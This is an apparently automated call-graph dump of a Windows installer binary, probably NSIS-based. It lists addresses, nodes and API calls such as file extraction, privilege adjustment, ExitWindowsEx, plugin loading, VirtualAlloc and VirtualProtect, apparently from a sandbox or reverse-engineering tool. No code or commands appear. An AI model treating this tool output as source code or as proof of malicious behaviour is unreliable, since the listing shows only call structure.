4173 403530 4172->4173 4174 406806 5 API calls 4173->4174 4175 403537 4174->4175 4176 406806 5 API calls 4175->4176 4177 40353e 4176->4177 4178 406806 5 API calls 4177->4178 4179 40354a #17 OleInitialize SHGetFileInfoW 4178->4179 4257 406411 lstrcpynW 4179->4257 4182 403596 GetCommandLineW 4258 406411 lstrcpynW 4182->4258 4184 4035a8 4185 405d13 CharNextW 4184->4185 4186 4035cd CharNextW 4185->4186 4187 4036f7 GetTempPathW 4186->4187 4188 4035e6 4186->4188 4259 403494 4187->4259 4193 405d13 CharNextW 4188->4193 4200 4036e0 4188->4200 4203 4036e2 4188->4203 4190 40370f 4191 403713 GetWindowsDirectoryW lstrcatW 4190->4191 4192 403769 DeleteFileW 4190->4192 4195 403494 12 API calls 4191->4195 4269 403015 GetTickCount GetModuleFileNameW 4192->4269 4193->4188 4196 40372f 4195->4196 4196->4192 4199 403733 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4196->4199 4197 403830 4356 403a06 4197->4356 4198 40377d 4198->4197 4201 403820 4198->4201 4206 405d13 CharNextW 4198->4206 4204 403494 12 API calls 4199->4204 4200->4187 4297 403ae0 4201->4297 4353 406411 lstrcpynW 4203->4353 4205 403761 4204->4205 4205->4192 4205->4197 4223 40379c 4206->4223 4210 40396a 4212 403972 GetCurrentProcess OpenProcessToken 4210->4212 4213 4039ee ExitProcess 4210->4213 4211 40384a 4363 405a77 4211->4363 4215 40398a LookupPrivilegeValueW AdjustTokenPrivileges 4212->4215 4216 4039be 4212->4216 4215->4216 4222 406806 5 API calls 4216->4222 4218 403860 4221 4059e2 5 API calls 4218->4221 4219 4037fa 4224 405dee 18 API calls 4219->4224 4226 403865 lstrcatW 4221->4226 4227 4039c5 4222->4227 4223->4218 4223->4219 4225 403806 4224->4225 4225->4197 4354 406411 lstrcpynW 4225->4354 4228 403881 lstrcatW lstrcmpiW 4226->4228 4229 403876 lstrcatW 4226->4229 4230 4039da ExitWindowsEx 4227->4230 4233 4039e7 4227->4233 4228->4197 4232 40389d 4228->4232 4229->4228 4230->4213 4230->4233 4235 4038a2 4232->4235 4236 4038a9 4232->4236 4369 40140b 4233->4369 4234 403815 4355 406411 lstrcpynW 4234->4355 4239 405948 4 API calls 4235->4239 4240 4059c5 2 API calls 4236->4240 4241 4038a7 4239->4241 4242 4038ae SetCurrentDirectoryW 4240->4242 4241->4242 4243 4038c9 4242->4243 4244 4038be 4242->4244 4368 406411 lstrcpynW 4243->4368 4367 406411 lstrcpynW 4244->4367 4247 40644e 17 API calls 4248 403908 DeleteFileW 4247->4248 4249 403915 CopyFileW 4248->4249 4254 4038d7 4248->4254 4249->4254 4250 40395e 4252 4061d7 36 API calls 4250->4252 4251 4061d7 36 API calls 4251->4254 4252->4197 4253 40644e 17 API calls 4253->4254 4254->4247 4254->4250 4254->4251 4254->4253 4255 4059fa 2 API calls 4254->4255 4256 403949 CloseHandle 4254->4256 4255->4254 4256->4254 4257->4182 4258->4184 4260 4066c0 5 API calls 4259->4260 4261 4034a0 4260->4261 4262 4034aa 4261->4262 4263 405ce6 3 API calls 4261->4263 4262->4190 4264 4034b2 4263->4264 4265 4059c5 2 API calls 4264->4265 4266 4034b8 4265->4266 4372 405f36 4266->4372 4376 405f07 GetFileAttributesW CreateFileW 4269->4376 4271 403055 4288 403065 4271->4288 4377 406411 lstrcpynW 4271->4377 4273 40307b 4274 405d32 2 API calls 4273->4274 4275 403081 4274->4275 4378 406411 lstrcpynW 4275->4378 4277 40308c GetFileSize 4293 403186 4277->4293 4296 4030a3 4277->4296 4279 40318f 4281 4031bf GlobalAlloc 4279->4281 4279->4288 4414 40347d SetFilePointer 4279->4414 4390 40347d SetFilePointer 4281->4390 4283 4031f2 4287 402fb1 6 API calls 4283->4287 4285 4031a8 4289 403467 ReadFile 4285->4289 4286 4031da 4391 40324c 4286->4391 4287->4288 4288->4198 4291 4031b3 4289->4291 4291->4281 4291->4288 4292 402fb1 6 API calls 4292->4296 4379 402fb1 4293->4379 4294 4031e6 4294->4288 4294->4294 4295 403223 SetFilePointer 4294->4295 4295->4288 4296->4283 4296->4288 4296->4292 4296->4293 4411 403467 4296->4411 4298 406806 5 API calls 4297->4298 4299 403af4 4298->4299 4300 403afa 4299->4300 4301 403b0c 4299->4301 4431 406358 wsprintfW 4300->4431 4302 4062df 3 API calls 4301->4302 4303 403b3c 4302->4303 4305 403b5b lstrcatW 4303->4305 4307 4062df 3 API calls 4303->4307 4306 403b0a 4305->4306 4416 403db6 4306->4416 4307->4305 4310 405dee 18 API calls 4311 403b8d 4310->4311 4312 403c21 4311->4312 4314 4062df 3 API calls 4311->4314 4313 405dee 18 API calls 4312->4313 4315 403c27 4313->4315 4316 403bbf 4314->4316 4317 403c37 LoadImageW 4315->4317 4318 40644e 17 API calls 4315->4318 4316->4312 4322 403be0 lstrlenW 4316->4322 4324 405d13 CharNextW 4316->4324 4319 403cdd 4317->4319 4320 403c5e RegisterClassW 4317->4320 4318->4317 4321 40140b 2 API calls 4319->4321 4323 403c94 SystemParametersInfoW CreateWindowExW 4320->4323 4352 403ce7 4320->4352 4328 403ce3 4321->4328 4325 403c14 4322->4325 4326 403bee lstrcmpiW 4322->4326 4323->4319 4330 403bdd 4324->4330 4329 405ce6 3 API calls 4325->4329 4326->4325 4327 403bfe GetFileAttributesW 4326->4327 4331 403c0a 4327->4331 4332 403db6 18 API calls 4328->4332 4328->4352 4333 403c1a 4329->4333 4330->4322 4331->4325 4334 405d32 2 API calls 4331->4334 4335 403cf4 4332->4335 4432 406411 lstrcpynW 4333->4432 4334->4325 4337 403d00 ShowWindow 4335->4337 4338 403d83 4335->4338 4340 406796 3 API calls 4337->4340 4424 40554c OleInitialize 4338->4424 4342 403d18 4340->4342 4341 403d89 4343 403da5 4341->4343 4344 403d8d 4341->4344 4345 403d26 GetClassInfoW 4342->4345 4347 406796 3 API calls 4342->4347 4346 40140b 2 API calls 4343->4346 4350 40140b 2 API calls 4344->4350 4344->4352 4348 403d50 DialogBoxParamW 4345->4348 4349 403d3a GetClassInfoW RegisterClassW 4345->4349 4346->4352 4347->4345 4351 40140b 2 API calls 4348->4351 4349->4348 4350->4352 4351->4352 4352->4197 4353->4200 4354->4234 4355->4201 4357 403a10 CloseHandle 4356->4357 4358 403a1e 4356->4358 4357->4358 4444 403a4b 4358->4444 4361 405b23 67 API calls 4362 403839 OleUninitialize 4361->4362 4362->4210 4362->4211 4366 405a8c 4363->4366 4364 403858 ExitProcess 4365 405aa0 MessageBoxIndirectW 4365->4364 4366->4364 4366->4365 4367->4243 4368->4254 4370 401389 2 API calls 4369->4370 4371 401420 4370->4371 4371->4213 4373 405f43 GetTickCount GetTempFileNameW 4372->4373 4374 4034c3 4373->4374 4375 405f79 4373->4375 4374->4190 4375->4373 4375->4374 4376->4271 4377->4273 4378->4277 4380 402fd2 4379->4380 4381 402fba 4379->4381 4384 402fe2 GetTickCount 4380->4384 4385 402fda 4380->4385 4382 402fc3 DestroyWindow 4381->4382 4383 402fca 4381->4383 4382->4383 4383->4279 4387 402ff0 CreateDialogParamW ShowWindow 4384->4387 4388 403013 4384->4388 4386 406842 2 API calls 4385->4386 4389 402fe0 4386->4389 4387->4388 4388->4279 4389->4279 4390->4286 4393 403265 4391->4393 4392 403293 4395 403467 ReadFile 4392->4395 4393->4392 4415 40347d SetFilePointer 4393->4415 4396 40329e 4395->4396 4397 403400 4396->4397 4398 4032b0 GetTickCount 4396->4398 4399 4033ea 4396->4399 4400 403442 4397->4400 4403 403404 4397->4403 4398->4399 4407 4032ff 4398->4407 4399->4294 4402 403467 ReadFile 4400->4402 4401 403467 ReadFile 4401->4407 4402->4399 4403->4399 4404 403467 ReadFile 4403->4404 4405 405fb9 WriteFile 4403->4405 4404->4403 4405->4403 4406 403355 GetTickCount 4406->4407 4407->4399 4407->4401 4407->4406 4408 40337a MulDiv wsprintfW 4407->4408 4410 405fb9 WriteFile 4407->4410 4409 405479 24 API calls 4408->4409 4409->4407 4410->4407 4412 405f8a ReadFile 4411->4412 4413 40347a 4412->4413 4413->4296 4414->4285 4415->4392 4417 403dca 4416->4417 4433 406358 wsprintfW 4417->4433 4419 403e3b 4434 403e6f 4419->4434 4421 403b6b 4421->4310 4422 403e40 4422->4421 4423 40644e 17 API calls 4422->4423 4423->4422 4437 4043b3 4424->4437 4426 4043b3 SendMessageW 4428 4055a8 OleUninitialize 4426->4428 4427 40556f 4429 405596 4427->4429 4440 401389 4427->4440 4428->4341 4429->4426 4431->4306 4432->4312 4433->4419 4435 40644e 17 API calls 4434->4435 4436 403e7d SetWindowTextW 4435->4436 4436->4422 4438 4043cb 4437->4438 4439 4043bc SendMessageW 4437->4439 4438->4427 4439->4438 4442 401390 4440->4442 4441 4013fe 4441->4427 4442->4441 4443 4013cb MulDiv SendMessageW 4442->4443 4443->4442 4446 403a59 4444->4446 4445 403a23 4445->4361 4446->4445 4447 403a5e FreeLibrary GlobalFree 4446->4447 4447->4445 4447->4447 4930 402947 4931 402d3e 17 API calls 4930->4931 4932 402955 4931->4932 4933 40296b 4932->4933 4934 402d3e 17 API calls 4932->4934 4935 405ee2 2 API calls 4933->4935 4934->4933 4936 402971 4935->4936 4958 405f07 GetFileAttributesW CreateFileW 4936->4958 4938 40297e 4939 402a21 4938->4939 4940 40298a GlobalAlloc 4938->4940 4943 402a29 DeleteFileW 4939->4943 4944 402a3c 4939->4944 4941 4029a3 4940->4941 4942 402a18 CloseHandle 4940->4942 4959 40347d SetFilePointer 4941->4959 4942->4939 4943->4944 4946 4029a9 4947 403467 ReadFile 4946->4947 4948 4029b2 GlobalAlloc 4947->4948 4949 4029c2 4948->4949 4950 4029f6 4948->4950 4951 40324c 31 API calls 4949->4951 4952 405fb9 WriteFile 4950->4952 4953 4029cf 4951->4953 4954 402a02 GlobalFree 4952->4954 4956 4029ed GlobalFree 4953->4956 4955 40324c 31 API calls 4954->4955 4957 402a15 4955->4957 4956->4950 4957->4942 4958->4938 4959->4946 4963 4016cc 4964 402d3e 17 API calls 4963->4964 4965 4016d2 GetFullPathNameW 4964->4965 4966 4016ec 4965->4966 4972 40170e 4965->4972 4969 40676f 2 API calls 4966->4969 4966->4972 4967 402bc2 4968 401723 GetShortPathNameW 4968->4967 4970 4016fe 4969->4970 4970->4972 4973 406411 lstrcpynW 4970->4973 4972->4967 4972->4968 4973->4972 4974 401e4e GetDC 4975 402d1c 17 API calls 4974->4975 4976 401e60 GetDeviceCaps MulDiv ReleaseDC 4975->4976 4977 402d1c 17 API calls 4976->4977 4978 401e91 4977->4978 4979 40644e 17 API calls 4978->4979 4980 401ece CreateFontIndirectW 4979->4980 4981 402630 4980->4981 4982 402acf 4983 402d1c 17 API calls 4982->4983 4984 402ad5 4983->4984 4985 402b12 4984->4985 4986 402925 4984->4986 4988 402ae7 4984->4988 4985->4986 4987 40644e 17 API calls 4985->4987 4987->4986 4988->4986 4990 406358 wsprintfW 4988->4990 4990->4986 4587 4020d0 4588 4020e2 4587->4588 4589 402194 4587->4589 4590 402d3e 17 API calls 4588->4590 4591 401423 24 API calls 4589->4591 4592 4020e9 4590->4592 4597 4022ee 4591->4597 4593 402d3e 17 API calls 4592->4593 4594 4020f2 4593->4594 4595 402108 LoadLibraryExW 4594->4595 4596 4020fa GetModuleHandleW 4594->4596 4595->4589 4598 402119 4595->4598 4596->4595 4596->4598 4610 406875 4598->4610 4601 402163 4605 405479 24 API calls 4601->4605 4602 40212a 4603 402132 4602->4603 4604 402149 4602->4604 4606 401423 24 API calls 4603->4606 4615 6f771777 4604->4615 4607 40213a 4605->4607 4606->4607 4607->4597 4608 402186 FreeLibrary 4607->4608 4608->4597 4657 406433 WideCharToMultiByte 4610->4657 4612 406892 4613 406899 GetProcAddress 4612->4613 4614 402124 4612->4614 4613->4614 4614->4601 4614->4602 4616 6f7717aa 4615->4616 4658 6f771b5f 4616->4658 4618 6f7717b1 4619 6f7718d6 4618->4619 4620 6f7717c2 4618->4620 4621 6f7717c9 4618->4621 4619->4607 4708 6f77239e 4620->4708 4692 6f7723e0 4621->4692 4626 6f77180f 4721 6f7725b5 4626->4721 4627 6f77182d 4630 6f771833 4627->4630 4631 6f77187e 4627->4631 4628 6f7717df 4633 6f7717e5 4628->4633 4639 6f7717f0 4628->4639 4629 6f7717f8 4640 6f7717ee 4629->4640 4718 6f772d83 4629->4718 4740 6f7715c6 4630->4740 4637 6f7725b5 10 API calls 4631->4637 4633->4640 4702 6f772af8 4633->4702 4643 6f77186f 4637->4643 4638 6f771815 4732 6f7715b4 4638->4732 4712 6f772770 4639->4712 4640->4626 4640->4627 4649 6f7718c5 4643->4649 4746 6f772578 4643->4746 4645 6f7717f6 4645->4640 4646 6f7725b5 10 API calls 4646->4643 4649->4619 4651 6f7718cf GlobalFree 4649->4651 4651->4619 4654 6f7718b1 4654->4649 4750 6f77153d wsprintfW 4654->4750 4655 6f7718aa FreeLibrary 4655->4654 4657->4612 4753 6f77121b GlobalAlloc 4658->4753 4660 6f771b86 4754 6f77121b GlobalAlloc 4660->4754 4662 6f771dcb GlobalFree GlobalFree GlobalFree 4663 6f771de8 4662->4663 4676 6f771e32 4662->4676 4665 6f7721de 4663->4665 4673 6f771dfd 4663->4673 4663->4676 4664 6f771c86 GlobalAlloc 4680 6f771b91 4664->4680 4666 6f772200 GetModuleHandleW 4665->4666 4665->4676 4667 6f772226 4666->4667 4668 6f772211 LoadLibraryW 4666->4668 4761 6f77161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4667->4761 4668->4667 4668->4676 4669 6f771cd1 lstrcpyW 4672 6f771cdb lstrcpyW 4669->4672 4670 6f771cef GlobalFree 4670->4680 4672->4680 4673->4676 4757 6f77122c 4673->4757 4674 6f772278 4674->4676 4679 6f772285 lstrlenW 4674->4679 4675 6f772086 4760 6f77121b GlobalAlloc 4675->4760 4676->4618 4762 6f77161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4679->4762 4680->4662 4680->4664 4680->4669 4680->4670 4680->4672 4680->4675 4680->4676 4683 6f771fc7 GlobalFree 4680->4683 4684 6f77210e 4680->4684 4685 6f771d2d 4680->4685 4687 6f77122c 2 API calls 4680->4687 4681 6f772238 4681->4674 4690 6f772262 GetProcAddress 4681->4690 4683->4680 4684->4676 4689 6f772176 lstrcpyW 4684->4689 4685->4680 4755 6f77158f GlobalSize GlobalAlloc 4685->4755 4686 6f77229f 4686->4676 4687->4680 4689->4676 4690->4674 4691 6f77208f 4691->4618 4699 6f7723f8 4692->4699 4693 6f77122c GlobalAlloc lstrcpynW 4693->4699 4695 6f772521 GlobalFree 4698 6f7717cf 4695->4698 4695->4699 4696 6f7724a0 GlobalAlloc WideCharToMultiByte 4696->4695 4697 6f7724cb GlobalAlloc CLSIDFromString 4697->4695 4698->4628 4698->4629 4698->4640 4699->4693 4699->4695 4699->4696 4699->4697 4701 6f7724ea 4699->4701 4764 6f7712ba 4699->4764 4701->4695 4768 6f772704 4701->4768 4704 6f772b0a 4702->4704 4703 6f772baf ReadFile 4707 6f772bcd 4703->4707 4704->4703 4706 6f772c99 4706->4640 4771 6f772aa2 4707->4771 4709 6f7723b3 4708->4709 4710 6f7723be GlobalAlloc 4709->4710 4711 6f7717c8 4709->4711 4710->4709 4711->4621 4716 6f7727a0 4712->4716 4713 6f77284e 4715 6f772854 GlobalSize 4713->4715 4717 6f77285e 4713->4717 4714 6f77283b GlobalAlloc 4714->4717 4715->4717 4716->4713 4716->4714 4717->4645 4719 6f772d8e 4718->4719 4720 6f772dce GlobalFree 4719->4720 4775 6f77121b GlobalAlloc 4721->4775 4723 6f77266b lstrcpynW 4727 6f7725bf 4723->4727 4724 6f77265a StringFromGUID2 4724->4727 4725 6f772638 MultiByteToWideChar 4725->4727 4726 6f7726a2 GlobalFree 4726->4727 4727->4723 4727->4724 4727->4725 4727->4726 4728 6f77267e wsprintfW 4727->4728 4729 6f7726d7 GlobalFree 4727->4729 4730 6f771272 2 API calls 4727->4730 4776 6f7712e1 4727->4776 4728->4727 4729->4638 4730->4727 4780 6f77121b GlobalAlloc 4732->4780 4734 6f7715b9 4735 6f7715c6 2 API calls 4734->4735 4736 6f7715c3 4735->4736 4737 6f771272 4736->4737 4738 6f7712b5 GlobalFree 4737->4738 4739 6f77127b GlobalAlloc lstrcpynW 4737->4739 4738->4643 4739->4738 4741 6f7715d2 wsprintfW 4740->4741 4742 6f7715ff lstrcpyW 4740->4742 4745 6f771618 4741->4745 4742->4745 4745->4646 4747 6f772586 4746->4747 4748 6f771891 4746->4748 4747->4748 4749 6f7725a2 GlobalFree 4747->4749 4748->4654 4748->4655 4749->4747 4751 6f771272 2 API calls 4750->4751 4752 6f77155e 4751->4752 4752->4649 4753->4660 4754->4680 4756 6f7715ad 4755->4756 4756->4685 4763 6f77121b GlobalAlloc 4757->4763 4759 6f77123b lstrcpynW 4759->4676 4760->4691 4761->4681 4762->4686 4763->4759 4765 6f7712c1 4764->4765 4766 6f77122c 2 API calls 4765->4766 4767 6f7712df 4766->4767 4767->4699 4769 6f772712 VirtualAlloc 4768->4769 4770 6f772768 4768->4770 4769->4770 4770->4701 4772 6f772aad 4771->4772 4773 6f772ab2 GetLastError 4772->4773 4774 6f772abd 4772->4774 4773->4774 4774->4706 4775->4727 4777 6f77130c 4776->4777 4778 6f7712ea 4776->4778 4777->4727 4778->4777 4779 6f7712f0 lstrcpyW 4778->4779 4779->4777 4780->4734 4991 404dd4 GetDlgItem GetDlgItem 4992 404e28 7 API calls 4991->4992 4995 405052 4991->4995 4993 404ed2 DeleteObject 4992->4993 4994 404ec5 SendMessageW 4992->4994 4996 404edd 4993->4996 4994->4993 5002 40513a 4995->5002 5024 4050c4 4995->5024 5045 404d22 SendMessageW 4995->5045 4997 404f14 4996->4997 5000 40644e 17 API calls 4996->5000 4998 404367 18 API calls 4997->4998 5001 404f28 4998->5001 4999 4051e3 5003 4051ec SendMessageW 4999->5003 5005 4051f8 4999->5005 5004 404ef6 SendMessageW SendMessageW 5000->5004 5007 404367 18 API calls 5001->5007 5002->4999 5008 405190 SendMessageW 5002->5008 5031 405045 5002->5031 5003->5005 5004->4996 5012 405211 5005->5012 5013 40520a ImageList_Destroy 5005->5013 5019 405221 5005->5019 5025 404f39 5007->5025 5015 4051a5 SendMessageW 5008->5015 5008->5031 5009 40512c SendMessageW 5009->5002 5010 4043ce 8 API calls 5011 4053e6 5010->5011 5016 40521a GlobalFree 5012->5016 5012->5019 5013->5012 5014 40539a 5020 4053ac ShowWindow GetDlgItem ShowWindow 5014->5020 5014->5031 5018 4051b8 5015->5018 5016->5019 5017 405014 GetWindowLongW SetWindowLongW 5021 40502d 5017->5021 5029 4051c9 SendMessageW 5018->5029 5019->5014 5038 40525c 5019->5038 5050 404da2 5019->5050 5020->5031 5022 405032 ShowWindow 5021->5022 5023 40504a 5021->5023 5043 40439c SendMessageW 5022->5043 5044 40439c SendMessageW 5023->5044 5024->5002 5024->5009 5025->5017 5028 404f8c SendMessageW 5025->5028 5030 40500f 5025->5030 5032 404fca SendMessageW 5025->5032 5033 404fde SendMessageW 5025->5033 5028->5025 5029->4999 5030->5017 5030->5021 5031->5010 5032->5025 5033->5025 5035 405366 5036 405370 InvalidateRect 5035->5036 5039 40537c 5035->5039 5036->5039 5037 40528a SendMessageW 5041 4052a0 5037->5041 5038->5037 5038->5041 5039->5014 5059 404cdd 5039->5059 5040 405314 SendMessageW SendMessageW 5040->5041 5041->5035 5041->5040 5043->5031 5044->4995 5046 404d81 SendMessageW 5045->5046 5047 404d45 GetMessagePos ScreenToClient SendMessageW 5045->5047 5048 404d79 5046->5048 5047->5048 5049 404d7e 5047->5049 5048->5024 5049->5046 5062 406411 lstrcpynW 5050->5062 5052 404db5 5063 406358 wsprintfW 5052->5063 5054 404dbf 5055 40140b 2 API calls 5054->5055 5056 404dc8 5055->5056 5064 406411 lstrcpynW 5056->5064 5058 404dcf 5058->5038 5065 404c14 5059->5065 5061 404cf2 5061->5014 5062->5052 5063->5054 5064->5058 5066 404c2d 5065->5066 5067 40644e 17 API calls 5066->5067 5068 404c91 5067->5068 5069 40644e 17 API calls 5068->5069 5070 404c9c 5069->5070 5071 40644e 17 API calls 5070->5071 5072 404cb2 lstrlenW wsprintfW SetDlgItemTextW 5071->5072 5072->5061 5073 4028d5 5074 4028dd 5073->5074 5075 4028e1 FindNextFileW 5074->5075 5077 4028f3 5074->5077 5076 40293a 5075->5076 5075->5077 5079 406411 lstrcpynW 5076->5079 5079->5077 5080 401956 5081 402d3e 17 API calls 5080->5081 5082 40195d lstrlenW 5081->5082 5083 402630 5082->5083 5084 6f7710e1 5088 6f771111 5084->5088 5085 6f7711d8 GlobalFree 5086 6f7712ba 2 API calls 5086->5088 5087 6f7711d3 5087->5085 5088->5085 5088->5086 5088->5087 5089 6f771164 GlobalAlloc 5088->5089 5090 6f7711f8 GlobalFree 5088->5090 5091 6f771272 2 API calls 5088->5091 5092 6f7712e1 lstrcpyW 5088->5092 5093 6f7711c4 GlobalFree 5088->5093 5089->5088 5090->5088 5091->5093 5092->5088 5093->5088 4805 4014d7 4806 402d1c 17 API calls 4805->4806 4807 4014dd Sleep 4806->4807 4809 402bc2 4807->4809 5094 4044d7 lstrlenW 5095 4044f6 5094->5095 5096 4044f8 WideCharToMultiByte 5094->5096 5095->5096 5097 404858 5098 404884 5097->5098 5099 404895 5097->5099 5158 405a5b GetDlgItemTextW 5098->5158 5101 4048a1 GetDlgItem 5099->5101 5104 404900 5099->5104 5103 4048b5 5101->5103 5102 40488f 5105 4066c0 5 API calls 5102->5105 5106 4048c9 SetWindowTextW 5103->5106 5109 405d91 4 API calls 5103->5109 5111 40644e 17 API calls 5104->5111 5119 4049e4 5104->5119 5156 404b93 5104->5156 5105->5099 5110 404367 18 API calls 5106->5110 5108 4043ce 8 API calls 5113 404ba7 5108->5113 5117 4048bf 5109->5117 5114 4048e5 5110->5114 5115 404974 SHBrowseForFolderW 5111->5115 5112 404a14 5116 405dee 18 API calls 5112->5116 5118 404367 18 API calls 5114->5118 5115->5119 5120 40498c CoTaskMemFree 5115->5120 5121 404a1a 5116->5121 5117->5106 5124 405ce6 3 API calls 5117->5124 5122 4048f3 5118->5122 5119->5156 5160 405a5b GetDlgItemTextW 5119->5160 5123 405ce6 3 API calls 5120->5123 5161 406411 lstrcpynW 5121->5161 5159 40439c SendMessageW 5122->5159 5126 404999 5123->5126 5124->5106 5129 4049d0 SetDlgItemTextW 5126->5129 5133 40644e 17 API calls 5126->5133 5128 4048f9 5131 406806 5 API calls 5128->5131 5129->5119 5130 404a31 5132 406806 5 API calls 5130->5132 5131->5104 5140 404a38 5132->5140 5134 4049b8 lstrcmpiW 5133->5134 5134->5129 5137 4049c9 lstrcatW 5134->5137 5135 404a79 5162 406411 lstrcpynW 5135->5162 5137->5129 5138 404a80 5139 405d91 4 API calls 5138->5139 5141 404a86 GetDiskFreeSpaceW 5139->5141 5140->5135 5144 405d32 2 API calls 5140->5144 5146 404ad1 5140->5146 5143 404aaa MulDiv 5141->5143 5141->5146 5143->5146 5144->5140 5145 404b42 5148 404b65 5145->5148 5150 40140b 2 API calls 5145->5150 5146->5145 5147 404cdd 20 API calls 5146->5147 5149 404b2f 5147->5149 5163 404389 KiUserCallbackDispatcher 5148->5163 5151 404b44 SetDlgItemTextW 5149->5151 5152 404b34 5149->5152 5150->5148 5151->5145 5155 404c14 20 API calls 5152->5155 5154 404b81 5154->5156 5164 4047b1 5154->5164 5155->5145 5156->5108 5158->5102 5159->5128 5160->5112 5161->5130 5162->5138 5163->5154 5165 4047c4 SendMessageW 5164->5165 5166 4047bf 5164->5166 5165->5156 5166->5165 5167 6f77166d 5173 6f771516 5167->5173 5169 6f7716cb GlobalFree 5170 6f771685 5170->5169 5171 6f7716a0 5170->5171 5172 6f7716b7 VirtualFree 5170->5172 5171->5169 5172->5169 5174 6f77151c 5173->5174 5175 6f771522 5174->5175 5176 6f77152e GlobalFree 5174->5176 5175->5170 5176->5170 4883 40175c 4884 402d3e 17 API calls 4883->4884 4885 401763 4884->4885 4886 405f36 2 API calls 4885->4886 4887 40176a 4886->4887 4888 405f36 2 API calls 4887->4888 4888->4887 5177 401d5d 5178 402d1c 17 API calls 5177->5178 5179 401d6e SetWindowLongW 5178->5179 5180 402bc2 5179->5180 4889 401ede 4890 402d1c 17 API calls 4889->4890 4891 401ee4 4890->4891 4892 402d1c 17 API calls 4891->4892 4893 401ef0 4892->4893 4894 401f07 EnableWindow 4893->4894 4895 401efc ShowWindow 4893->4895 4896 402bc2 4894->4896 4895->4896 5181 401563 5182 402b08 5181->5182 5185 406358 wsprintfW 5182->5185 5184 402b0d 5185->5184 5186 6f7716d4 5187 6f771703 5186->5187 5188 6f771b5f 22 API calls 5187->5188 5189 6f77170a 5188->5189 5190 6f771711 5189->5190 5191 6f77171d 5189->5191 5192 6f771272 2 API calls 5190->5192 5193 6f771727 5191->5193 5194 6f771744 5191->5194 5198 6f77171b 5192->5198 5195 6f77153d 3 API calls 5193->5195 5196 6f77176e 5194->5196 5197 6f77174a 5194->5197 5200 6f77172c 5195->5200 5199 6f77153d 3 API calls 5196->5199 5201 6f7715b4 3 API calls 5197->5201 5199->5198 5202 6f7715b4 3 API calls 5200->5202 5203 6f77174f 5201->5203 5205 6f771732 5202->5205 5204 6f771272 2 API calls 5203->5204 5206 6f771755 GlobalFree 5204->5206 5207 6f771272 2 API calls 5205->5207 5206->5198 5208 6f771769 GlobalFree 5206->5208 5209 6f771738 GlobalFree 5207->5209 5208->5198 5209->5198 5210 4026e4 5211 402d1c 17 API calls 5210->5211 5212 4026f3 5211->5212 5213 40273d ReadFile 5212->5213 5214 405f8a ReadFile 5212->5214 5216 402832 5212->5216 5217 40277d MultiByteToWideChar 5212->5217 5219 4027a3 SetFilePointer MultiByteToWideChar 5212->5219 5220 402843 5212->5220 5222 402830 5212->5222 5223 405fe8 SetFilePointer 5212->5223 5213->5212 5213->5222 5214->5212 5232 406358 wsprintfW 5216->5232 5217->5212 5219->5212 5221 402864 SetFilePointer 5220->5221 5220->5222 5221->5222 5224 40601c 5223->5224 5225 406004 5223->5225 5224->5212 5226 405f8a ReadFile 5225->5226 5227 406010 5226->5227 5227->5224 5228 406025 SetFilePointer 5227->5228 5229 40604d SetFilePointer 5227->5229 5228->5229 5230 406030 5228->5230 5229->5224 5231 405fb9 WriteFile 5230->5231 5231->5224 5232->5222 4448 6f7729df 4449 6f772a2f 4448->4449 4450 6f7729ef VirtualProtect 4448->4450 4450->4449 5233 401968 5234 402d1c 17 API calls 5233->5234 5235 40196f 5234->5235 5236 402d1c 17 API calls 5235->5236 5237 40197c 5236->5237 5238 402d3e 17 API calls 5237->5238 5239 401993 lstrlenW 5238->5239 5241 4019a4 5239->5241 5240 4019e5 5241->5240 5245 406411 lstrcpynW 5241->5245 5243 4019d5 5243->5240 5244 4019da lstrlenW 5243->5244 5244->5240 5245->5243 5246 40166a 5247 402d3e 17 API calls 5246->5247 5248 401670 5247->5248 5249 40676f 2 API calls 5248->5249 5250 401676 5249->5250 5251 4023ec 5252 402d3e 17 API calls 5251->5252 5253 4023fb 5252->5253 5254 402d3e 17 API calls 5253->5254 5255 402404 5254->5255 5256 402d3e 17 API calls 5255->5256 5257 40240e GetPrivateProfileStringW 5256->5257 5258 4053ed 5259 405411 5258->5259 5260 4053fd 5258->5260 5263 405419 IsWindowVisible 5259->5263 5269 405430 5259->5269 5261 405403 5260->5261 5262 40545a 5260->5262 5264 4043b3 SendMessageW 5261->5264 5266 40545f CallWindowProcW 5262->5266 5263->5262 5265 405426 5263->5265 5267 40540d 5264->5267 5268 404d22 5 API calls 5265->5268 5266->5267 5268->5269 5269->5266 5270 404da2 4 API calls 5269->5270 5270->5262 5271 6f7718d9 5273 6f7718fc 5271->5273 5272 6f771943 5275 6f771272 2 API calls 5272->5275 5273->5272 5274 6f771931 GlobalFree 5273->5274 5274->5272 5276 6f771ace GlobalFree GlobalFree 5275->5276 4545 40176f 4546 402d3e 17 API calls 4545->4546 4547 401776 4546->4547 4548 401796 4547->4548 4549 40179e 4547->4549 4585 406411 lstrcpynW 4548->4585 4586 406411 lstrcpynW 4549->4586 4552 40179c 4556 4066c0 5 API calls 4552->4556 4553 4017a9 4554 405ce6 3 API calls 4553->4554 4555 4017af lstrcatW 4554->4555 4555->4552 4563 4017bb 4556->4563 4557 4017f7 4559 405ee2 2 API calls 4557->4559 4558 40676f 2 API calls 4558->4563 4559->4563 4561 4017cd CompareFileTime 4561->4563 4562 40188d 4564 405479 24 API calls 4562->4564 4563->4557 4563->4558 4563->4561 4563->4562 4566 406411 lstrcpynW 4563->4566 4573 40644e 17 API calls 4563->4573 4581 405a77 MessageBoxIndirectW 4563->4581 4582 401864 4563->4582 4584 405f07 GetFileAttributesW CreateFileW 4563->4584 4567 401897 4564->4567 4565 405479 24 API calls 4568 401879 4565->4568 4566->4563 4569 40324c 31 API calls 4567->4569 4570 4018aa 4569->4570 4571 4018be SetFileTime 4570->4571 4572 4018d0 CloseHandle 4570->4572 4571->4572 4572->4568 4574 4018e1 4572->4574 4573->4563 4575 4018e6 4574->4575 4576 4018f9 4574->4576 4577 40644e 17 API calls 4575->4577 4578 40644e 17 API calls 4576->4578 4579 4018ee lstrcatW 4577->4579 4580 401901 4578->4580 4579->4580 4580->4568 4583 405a77 MessageBoxIndirectW 4580->4583 4581->4563 4582->4565 4582->4568 4583->4568 4584->4563 4585->4552 4586->4553 5277 6f771058 5280 6f771074 5277->5280 5278 6f7710dd 5279 6f771092 5282 6f771516 GlobalFree 5279->5282 5280->5278 5280->5279 5281 6f771516 GlobalFree 5280->5281 